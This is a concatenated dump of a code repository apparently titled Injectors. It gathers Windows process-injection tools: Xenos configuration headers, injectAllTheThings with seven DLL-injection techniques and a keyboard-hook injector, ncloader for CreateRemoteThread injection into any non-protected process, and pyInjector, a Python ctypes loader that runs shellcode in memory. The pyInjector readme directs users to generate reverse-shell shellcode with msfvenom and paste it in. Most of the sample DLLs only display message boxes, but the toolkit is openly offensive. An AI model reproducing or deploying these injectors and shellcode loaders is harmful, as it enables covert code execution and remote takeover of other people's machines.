uType = MB_ICONINFORMATION; 56 | logLevel = xlog::LogLevel::normal; 57 | } 58 | else if (type == Question) 59 | { 60 | uType = MB_YESNO | MB_ICONQUESTION; 61 | logLevel = xlog::LogLevel::verbose; 62 | } 63 | 64 | // Write to log 65 | if (logLevel < xlog::LogLevel::verbose) 66 | xlog::Logger::Instance().DoLog( logLevel, "%ls", msg.c_str() ); 67 | 68 | return MessageBoxW( parent, msg.c_str(), title.c_str(), uType ); 69 | } 70 | }; -------------------------------------------------------------------------------- /Xenos/src/ProfileMgr.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "rapidxml_wrap.hpp" 4 | 5 | 6 | class ProfileMgr 7 | { 8 | public: 9 | typedef std::vector vecPaths; 10 | struct ConfigData 11 | { 12 | vecPaths images; // Dll paths 13 | std::wstring procName; // Target process name or full-qualified path 14 | std::wstring procCmdLine; // Process command line 15 | std::wstring initRoutine; // Dll initialization function 16 | std::wstring initArgs; // Arguments passed into init function 17 | 18 | uint32_t pid = 0; // Temporary pid for instant injection 19 | uint32_t mmapFlags = 0; // Manual mapping flags 20 | uint32_t processMode = 0; // Process launch mode 21 | uint32_t injectMode = 0; // Injection type 22 | uint32_t delay = 0; // Delay before injection 23 | uint32_t period = 0; // Delay between images 24 | uint32_t skipProc = 0; // Skip N first processes 25 | 26 | bool hijack = false; // Hijack existing thread 27 | bool unlink = false; // Unlink image after injection 28 | bool erasePE = false; // Erase PE headers for native inject 29 | bool close = false; // Close app after injection 30 | bool krnHandle = false; // Escalate process handle access rights 31 | bool injIndef = false; // Inject indefinitely 32 | }; 33 | 34 | public: 35 | bool Save( const std::wstring& path = L"" ); 36 | bool Load( const std::wstring& path = L"" ); 37 | 38 | inline ConfigData& config() { return _config; } 39 | 40 | private: 41 | ConfigData _config; 42 | }; 43 | 44 | 45 | -------------------------------------------------------------------------------- /Xenos/src/StatusBar.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "Control.hpp" 4 | #include 5 | 6 | namespace ctrl 7 | { 8 | 9 | class StatusBar: public Control 10 | { 11 | public: 12 | StatusBar( HWND hwnd = NULL ) 13 | : Control( hwnd ) { } 14 | 15 | void SetParts( const std::initializer_list& coords ) 16 | { 17 | int i = 0; 18 | std::unique_ptr coordArray( new int[coords.size()]() ); 19 | for (auto& item : coords) 20 | { 21 | coordArray[i] = item; 22 | i++; 23 | } 24 | 25 | SendMessage( _hwnd, SB_SETPARTS, i, (LPARAM)coordArray.get() ); 26 | } 27 | 28 | void SetText( int index, const std::wstring& text ) 29 | { 30 | SendMessage( _hwnd, SB_SETTEXT, MAKEWORD( index, SBT_NOBORDERS ), (LPARAM)text.c_str() ); 31 | } 32 | }; 33 | 34 | } -------------------------------------------------------------------------------- /Xenos/src/alien.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/Xenos/src/alien.ico -------------------------------------------------------------------------------- /Xenos/src/stdafx.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #ifndef WIN32_LEAN_AND_MEAN 4 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 5 | #endif 6 | 7 | #pragma warning(disable : 4995) 8 | 9 | // Windows Header Files: 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | 16 | // C RunTime Header Files 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | 25 | // C++ RunTime Header Files 26 | #include 27 | #include 28 | #include 29 | 30 | // Manifest 31 | #pragma comment(linker, "/manifestdependency:\"type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='*' publicKeyToken='6595b64144ccf1df' language='*'\"") 32 | -------------------------------------------------------------------------------- /Xenos/src/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | -------------------------------------------------------------------------------- /injectAllTheThings/dllmain/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | DYNAMIC LINK LIBRARY : dllmain Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this dllmain DLL for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your dllmain application. 9 | 10 | 11 | dllmain.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | dllmain.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | dllmain.cpp 25 | This is the main DLL source file. 26 | 27 | When created, this DLL does not export any symbols. As a result, it 28 | will not produce a .lib file when it is built. If you wish this project 29 | to be a project dependency of some other project, you will either need to 30 | add code to export some symbols from the DLL so that an export library 31 | will be produced, or you can set the Ignore Input Library property to Yes 32 | on the General propert page of the Linker folder in the project's Property 33 | Pages dialog box. 34 | 35 | ///////////////////////////////////////////////////////////////////////////// 36 | Other standard files: 37 | 38 | StdAfx.h, StdAfx.cpp 39 | These files are used to build a precompiled header (PCH) file 40 | named dllmain.pch and a precompiled types file named StdAfx.obj. 41 | 42 | ///////////////////////////////////////////////////////////////////////////// 43 | Other notes: 44 | 45 | AppWizard uses "TODO:" comments to indicate parts of the source code you 46 | should add to or customize. 47 | 48 | ///////////////////////////////////////////////////////////////////////////// 49 | -------------------------------------------------------------------------------- /injectAllTheThings/dllmain/dllmain.cpp: -------------------------------------------------------------------------------- 1 | // dllmain.cpp : Defines the entry point for the DLL application. 2 | #include "stdafx.h" 3 | 4 | BOOL APIENTRY DllMain( HMODULE hModule, 5 | DWORD ul_reason_for_call, 6 | LPVOID lpReserved 7 | ) 8 | { 9 | switch (ul_reason_for_call) 10 | { 11 | case DLL_PROCESS_ATTACH: 12 | MessageBox(NULL, L"Process attach!", L"Inject All The Things!", 0); 13 | break; 14 | case DLL_THREAD_ATTACH: 15 | //MessageBox(NULL, L"Thread attach!", L"Inject All The Things!", 0); 16 | break; 17 | case DLL_THREAD_DETACH: 18 | //MessageBox(NULL, L"Thread detach!", L"Inject All The Things!", 0); 19 | break; 20 | case DLL_PROCESS_DETACH: 21 | //MessageBox(NULL, L"Process detach!", L"Inject All The Things!", 0); 22 | break; 23 | } 24 | return TRUE; 25 | } 26 | 27 | -------------------------------------------------------------------------------- /injectAllTheThings/dllmain/dllmain.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | -------------------------------------------------------------------------------- /injectAllTheThings/dllmain/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // dllmain.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /injectAllTheThings/dllmain/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 11 | // Windows Header Files: 12 | #include 13 | 14 | 15 | 16 | // TODO: reference additional headers your program requires here 17 | -------------------------------------------------------------------------------- /injectAllTheThings/dllmain/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /injectAllTheThings/dllpoc/dllpoc.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) 5 | { 6 | switch (ul_reason_for_call) 7 | { 8 | case DLL_PROCESS_ATTACH: 9 | break; 10 | case DLL_PROCESS_DETACH: 11 | break; 12 | case DLL_THREAD_ATTACH: 13 | break; 14 | case DLL_THREAD_DETACH: 15 | break; 16 | } 17 | return TRUE; 18 | } 19 | 20 | //extern "C" __declspec(dllexport) int poc(int code, WPARAM wParam, LPARAM lParam) { 21 | extern "C" __declspec(dllexport) BOOL poc() { 22 | MessageBox(NULL, L"POC called!", L"Inject All The Things!", 0); 23 | 24 | //return(CallNextHookEx(NULL, code, wParam, lParam)); 25 | return TRUE; 26 | } -------------------------------------------------------------------------------- /injectAllTheThings/dllpoc/dllpoc.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /injectAllTheThings/injectAllTheThings.v12.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/injectAllTheThings/injectAllTheThings.v12.suo -------------------------------------------------------------------------------- /injectAllTheThings/injectAllTheThings/auxiliary.h: -------------------------------------------------------------------------------- 1 | /* 2 | * definitions for auxiliary functions 3 | */ 4 | DWORD findPidByName(wchar_t * pname); 5 | VOID displayHelp(); 6 | DWORD checkOS(); 7 | DWORD getThreadID(DWORD pid); 8 | BOOL SetSePrivilege(); 9 | -------------------------------------------------------------------------------- /injectAllTheThings/injectAllTheThings/fheaders.h: -------------------------------------------------------------------------------- 1 | // Technique 1: CreateRemoteThread 2 | DWORD demoCreateRemoteThreadW(PCWSTR pszLibFile, DWORD dwProcessId); 3 | 4 | // Technique 2: NtCreateThreadEx 5 | DWORD demoNtCreateThreadEx(PCWSTR pszLibFile, DWORD dwProcessId); 6 | 7 | struct NtCreateThreadExBuffer { 8 | ULONG Size; 9 | ULONG Unknown1; 10 | ULONG Unknown2; 11 | PULONG Unknown3; 12 | ULONG Unknown4; 13 | ULONG Unknown5; 14 | ULONG Unknown6; 15 | PULONG Unknown7; 16 | ULONG Unknown8; 17 | }; 18 | 19 | typedef NTSTATUS(WINAPI *LPFUN_NtCreateThreadEx) ( 20 | PHANDLE hThread, 21 | ACCESS_MASK DesiredAccess, 22 | LPVOID ObjectAttributes, 23 | HANDLE ProcessHandle, 24 | LPTHREAD_START_ROUTINE lpStartAddress, 25 | LPVOID lpParameter, 26 | BOOL CreateSuspended, 27 | ULONG StackZeroBits, 28 | ULONG SizeOfStackCommit, 29 | ULONG SizeOfStackReserve, 30 | LPVOID lpBytesBuffer 31 | ); 32 | 33 | // Technique 3: QueueUserAPC 34 | DWORD demoQueueUserAPC(PCWSTR pszLibFile, DWORD dwProcessId); 35 | 36 | // Technique 4: SetWindowsHookEx 37 | DWORD demoSetWindowsHookEx(PCWSTR pszLibFile, DWORD dwProcessId, wchar_t *strProcName); 38 | 39 | // Technique 5: RtlCreateUserThread 40 | BOOL RtlCreateUserThread_Injection(); 41 | DWORD demoRtlCreateUserThread(PCWSTR pszLibFile, DWORD dwProcessId); 42 | 43 | // Function Pointer Typedef for RtlCreateUserThread 44 | typedef DWORD(WINAPI * pRtlCreateUserThread)( 45 | IN HANDLE ProcessHandle, 46 | IN PSECURITY_DESCRIPTOR SecurityDescriptor, 47 | IN BOOL CreateSuspended, 48 | IN ULONG StackZeroBits, 49 | IN OUT PULONG StackReserved, 50 | IN OUT PULONG StackCommit, 51 | IN LPVOID StartAddress, 52 | IN LPVOID StartParameter, 53 | OUT HANDLE ThreadHandle, 54 | OUT LPVOID ClientID 55 | ); 56 | 57 | // Technique 6: thread suspend/inject/resume 58 | #ifndef _WIN64 59 | DWORD demoSuspendInjectResume(PCWSTR pszLibFile, DWORD dwProcessId); 60 | #endif 61 | DWORD demoSuspendInjectResume64(PCWSTR pszLibFile, DWORD dwProcessId); 62 | 63 | // Technique 7: Reflective DLL Injection 64 | DWORD demoReflectiveDllInjection(PCWSTR pszLibFile, DWORD dwProcessId); 65 | -------------------------------------------------------------------------------- /injectAllTheThings/injectAllTheThings/main.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include "fheaders.h" 4 | #include "auxiliary.h" 5 | 6 | DWORD wmain(int argc, wchar_t* argv[]) 7 | { 8 | PCWSTR pszLibFile = NULL; 9 | wchar_t *strProcName; 10 | DWORD dwProcessId = 0; 11 | DWORD dwTechnique = 0; 12 | DWORD v = checkOS(); 13 | 14 | if (argc != 5) 15 | { 16 | displayHelp(); 17 | return(0); 18 | } 19 | 20 | if (_wcsicmp(argv[1], TEXT("-t")) == 0) 21 | { 22 | strProcName = (wchar_t *)malloc((wcslen(argv[3]) + 1) * sizeof(wchar_t)); 23 | strProcName = argv[3]; 24 | 25 | pszLibFile = (wchar_t *)malloc((wcslen(argv[4]) + 1) * sizeof(wchar_t)); 26 | pszLibFile = argv[4]; 27 | 28 | dwProcessId = findPidByName(strProcName); 29 | if (dwProcessId == 0) 30 | { 31 | wprintf(TEXT("[-] Error: Could not find PID (%d).\n"), dwProcessId); 32 | return(1); 33 | } 34 | 35 | SetSePrivilege(); 36 | 37 | switch (_wtoi(argv[2])) 38 | { 39 | case 1: 40 | demoCreateRemoteThreadW(pszLibFile, dwProcessId); 41 | break; 42 | case 2: 43 | if (v < 2) 44 | wprintf(TEXT("[-] NtCreateThread() is only available in Windows Vista and up.")); 45 | else 46 | demoNtCreateThreadEx(pszLibFile, dwProcessId); 47 | break; 48 | case 3: 49 | demoQueueUserAPC(pszLibFile, dwProcessId); 50 | break; 51 | case 4: 52 | demoSetWindowsHookEx(pszLibFile, dwProcessId, strProcName); 53 | break; 54 | case 5: 55 | demoRtlCreateUserThread(pszLibFile, dwProcessId); 56 | break; 57 | case 6: 58 | #ifdef _WIN64 59 | demoSuspendInjectResume64(pszLibFile, dwProcessId); 60 | #else 61 | demoSuspendInjectResume(pszLibFile, dwProcessId); 62 | #endif 63 | break; 64 | case 7: 65 | demoReflectiveDllInjection(pszLibFile, dwProcessId); 66 | break; 67 | default: 68 | displayHelp(); 69 | } 70 | } 71 | else 72 | displayHelp(); 73 | 74 | return(0); 75 | } 76 | -------------------------------------------------------------------------------- /injectAllTheThings/injectAllTheThings/t_SetWindowsHookEx.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "fheaders.h" 5 | #include "auxiliary.h" 6 | 7 | DWORD demoSetWindowsHookEx(PCWSTR pszLibFile, DWORD dwProcessId, wchar_t *strProcName) 8 | { 9 | DWORD dwThreadId = getThreadID(dwProcessId); 10 | if (dwThreadId == (DWORD)0) 11 | { 12 | wprintf(TEXT("[-] Error: Cannot find thread")); 13 | return(1); 14 | } 15 | 16 | #ifdef _DEBUG 17 | wprintf(TEXT("[+] Using Thread ID %u\n"), dwThreadId); 18 | #endif 19 | 20 | HMODULE dll = LoadLibraryEx(pszLibFile, NULL, DONT_RESOLVE_DLL_REFERENCES); 21 | if (dll == NULL) 22 | { 23 | wprintf(TEXT("[-] Error: The DLL could not be found.\n")); 24 | return(1); 25 | } 26 | 27 | // Your DLL needs to export the 'poc' function 28 | HOOKPROC addr = (HOOKPROC)GetProcAddress(dll, "poc"); 29 | if (addr == NULL) 30 | { 31 | wprintf(TEXT("[-] Error: The DLL exported function was not found.\n")); 32 | return(1); 33 | } 34 | 35 | HWND targetWnd = FindWindow(NULL, strProcName); 36 | GetWindowThreadProcessId(targetWnd, &dwProcessId); 37 | 38 | HHOOK handle = SetWindowsHookEx(WH_KEYBOARD, addr, dll, dwThreadId); 39 | if (handle == NULL) 40 | { 41 | wprintf(TEXT("[-] Error: The KEYBOARD could not be hooked.\n")); 42 | return(1); 43 | } 44 | else 45 | { 46 | wprintf(TEXT("[+] Program successfully hooked.\nPress enter to unhook the function and stop the program.\n")); 47 | getchar(); 48 | UnhookWindowsHookEx(handle); 49 | } 50 | 51 | return(0); 52 | } -------------------------------------------------------------------------------- /injectAllTheThings/rdll/LICENSE.txt: -------------------------------------------------------------------------------- 1 | Copyright (c) 2011, Stephen Fewer of Harmony Security (www.harmonysecurity.com) 2 | All rights reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, are permitted 5 | provided that the following conditions are met: 6 | 7 | * Redistributions of source code must retain the above copyright notice, this list of 8 | conditions and the following disclaimer. 9 | 10 | * Redistributions in binary form must reproduce the above copyright notice, this list of 11 | conditions and the following disclaimer in the documentation and/or other materials provided 12 | with the distribution. 13 | 14 | * Neither the name of Harmony Security nor the names of its contributors may be used to 15 | endorse or promote products derived from this software without specific prior written permission. 16 | 17 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 18 | IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND 19 | FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 20 | CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 21 | CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 22 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 23 | THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 24 | OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 25 | POSSIBILITY OF SUCH DAMAGE. -------------------------------------------------------------------------------- /injectAllTheThings/rdll/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | DYNAMIC LINK LIBRARY : rdll Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this rdll DLL for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your rdll application. 9 | 10 | 11 | rdll.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | rdll.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | rdll.cpp 25 | This is the main DLL source file. 26 | 27 | When created, this DLL does not export any symbols. As a result, it 28 | will not produce a .lib file when it is built. If you wish this project 29 | to be a project dependency of some other project, you will either need to 30 | add code to export some symbols from the DLL so that an export library 31 | will be produced, or you can set the Ignore Input Library property to Yes 32 | on the General propert page of the Linker folder in the project's Property 33 | Pages dialog box. 34 | 35 | ///////////////////////////////////////////////////////////////////////////// 36 | Other standard files: 37 | 38 | StdAfx.h, StdAfx.cpp 39 | These files are used to build a precompiled header (PCH) file 40 | named rdll.pch and a precompiled types file named StdAfx.obj. 41 | 42 | ///////////////////////////////////////////////////////////////////////////// 43 | Other notes: 44 | 45 | AppWizard uses "TODO:" comments to indicate parts of the source code you 46 | should add to or customize. 47 | 48 | ///////////////////////////////////////////////////////////////////////////// 49 | -------------------------------------------------------------------------------- /injectAllTheThings/rdll/dllmain.cpp: -------------------------------------------------------------------------------- 1 | //===============================================================================================// 2 | // This is a stub for the actuall functionality of the DLL. 3 | //===============================================================================================// 4 | #include "ReflectiveLoader.h" 5 | 6 | // Note: REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR and REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN are 7 | // defined in the project properties (Properties->C++->Preprocessor) so as we can specify our own 8 | // DllMain and use the LoadRemoteLibraryR() API to inject this DLL. 9 | 10 | // You can use this value as a pseudo hinstDLL value (defined and set via ReflectiveLoader.c) 11 | extern "C" HINSTANCE hAppInstance; 12 | //===============================================================================================// 13 | BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved ) 14 | { 15 | BOOL bReturnValue = TRUE; 16 | switch( dwReason ) 17 | { 18 | case DLL_QUERY_HMODULE: 19 | if( lpReserved != NULL ) 20 | *(HMODULE *)lpReserved = hAppInstance; 21 | break; 22 | case DLL_PROCESS_ATTACH: 23 | hAppInstance = hinstDLL; 24 | MessageBoxA( NULL, "Reflective Dll Injection!", "Inject All The Things!", MB_OK ); 25 | break; 26 | case DLL_PROCESS_DETACH: 27 | case DLL_THREAD_ATTACH: 28 | case DLL_THREAD_DETACH: 29 | break; 30 | } 31 | return bReturnValue; 32 | } -------------------------------------------------------------------------------- /injectAllTheThings/rdll/rdll.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | -------------------------------------------------------------------------------- /injectAllTheThings/rdll/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // rdll.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /injectAllTheThings/rdll/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 11 | // Windows Header Files: 12 | #include 13 | 14 | 15 | 16 | // TODO: reference additional headers your program requires here 17 | -------------------------------------------------------------------------------- /injectAllTheThings/rdll/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /ncloader/README.md: -------------------------------------------------------------------------------- 1 | Ncloader 2 | ======== 3 | 4 | #A simple dll injection utility# 5 | The current design implements the well-known DLL injection technique: 6 | - VirtualAllocEx (allocates memory for string in remote process) 7 | - WriteProcessMemory (writes the "path/to/dll/file" in remotely allocated memory) 8 | - CreateRemoteThread (with start address of LoadLibrary[A/W] and address to "path/to/dll/file" as parameter) 9 | 10 | ##Features## 11 | - From elevated admin prompt, injects into any (non-protected) process including session 0 processes 12 | - Standalone (no third-party library, statically compiled) 13 | - Clean code (compiles with no warnings and /Wall on MSVC) 14 | - Strict error checking and verbose reporting 15 | - No undocumented NT api 16 | - Not creating services 17 | - Not using driver 18 | - 32bit and 64bit pre-compiled binaries 19 | 20 | ###Usage### 21 | ``` 22 | ncloader.exe [process name | pid] [dll full path] [1] 23 | note: the optional trailing '1' disables elevation attempt 24 | ``` 25 | 26 | ###Examples### 27 | By process name from regular prompt (debug privilege not present in restricted token) 28 | ``` 29 | ncloader.exe some_service.exe c:\path\to\library.dll 30 | Dll c:\path\to\library.dll successfully injected in session 0 process some_service.exe (debug privilege was enabled) 31 | ``` 32 | By PID from elevated prompt (token has debug privilege present but disabled) 33 | ``` 34 | ncloader.exe 1234 c:\path\to\library.dll 35 | Dll c:\path\to\library.dll successfully injected in session 1 process 1234 36 | ``` 37 | -------------------------------------------------------------------------------- /ncloader/Release/ncloader.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/ncloader/Release/ncloader.exe -------------------------------------------------------------------------------- /ncloader/ncloader.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 14 4 | VisualStudioVersion = 14.0.24720.0 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ncloader", "ncloader.vcxproj", "{FE82384B-FDDC-4337-B131-96231E7841EE}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {FE82384B-FDDC-4337-B131-96231E7841EE}.Debug|x64.ActiveCfg = Debug|x64 17 | {FE82384B-FDDC-4337-B131-96231E7841EE}.Debug|x64.Build.0 = Debug|x64 18 | {FE82384B-FDDC-4337-B131-96231E7841EE}.Debug|x86.ActiveCfg = Debug|Win32 19 | {FE82384B-FDDC-4337-B131-96231E7841EE}.Debug|x86.Build.0 = Debug|Win32 20 | {FE82384B-FDDC-4337-B131-96231E7841EE}.Release|x64.ActiveCfg = Release|x64 21 | {FE82384B-FDDC-4337-B131-96231E7841EE}.Release|x64.Build.0 = Release|x64 22 | {FE82384B-FDDC-4337-B131-96231E7841EE}.Release|x86.ActiveCfg = Release|Win32 23 | {FE82384B-FDDC-4337-B131-96231E7841EE}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | EndGlobal 29 | -------------------------------------------------------------------------------- /ncloader/x64/Release/ncloader.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rootm0s/Injectors/7c3b6f9a1b5ccb11d09c893da0dfbb95eefb006e/ncloader/x64/Release/ncloader.exe -------------------------------------------------------------------------------- /pyInjector/pyInjector/README.txt: -------------------------------------------------------------------------------- 1 | Copy the shellcode.py to your Ubuntu/BT box. Make sure you change the path in the file to where MSFVenom is located at. 2 | 3 | Also change the IP addresses and Ports you want for the reverse shell. 4 | 5 | Run shellcode.py, this will generate the proper format for the shellcode. Copy and paste the shellcode into pyinjector.exe: 6 | 7 | pyinjector.exe 8 | 9 | -------------------------------------------------------------------------------- /pyInjector/pyInjector/pyinjector.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import ctypes 3 | import sys 4 | # PyInjector Written by Dave Kennedy (ReL1K) @ TrustedSec.com 5 | # Injects shellcode into memory through Python and ctypes 6 | # 7 | # Initial awesome code and credit found here: 8 | # http://www.debasish.in/2012_04_01_archive.html 9 | 10 | # see if we specified shellcode 11 | try: 12 | shellcode = sys.argv[1] 13 | 14 | # if we didn't specify a param 15 | except IndexError: 16 | print "Python Shellcode Injector: Written by Dave Kennedy at TrustedSec" 17 | print "Example: pyinjector.exe \\x41\\x41\\x41\\x41" 18 | print "Usage: pyinjector.exe " 19 | sys.exit() 20 | 21 | # need to code the input into the right format through string escape 22 | shellcode = shellcode.decode("string_escape") 23 | 24 | # convert to bytearray 25 | shellcode = bytearray(shellcode) 26 | 27 | # use types windll.kernel32 for virtualalloc reserves region of pages in virtual addres sspace 28 | ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), 29 | ctypes.c_int(len(shellcode)), 30 | ctypes.c_int(0x3000), 31 | ctypes.c_int(0x40)) 32 | 33 | # use virtuallock to lock region for physical address space 34 | ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr), 35 | ctypes.c_int(len(shellcode))) 36 | 37 | # read in the buffer 38 | buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) 39 | 40 | # moved the memory in 4 byte blocks 41 | ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), 42 | buf, 43 | ctypes.c_int(len(shellcode))) 44 | # launch in a thread 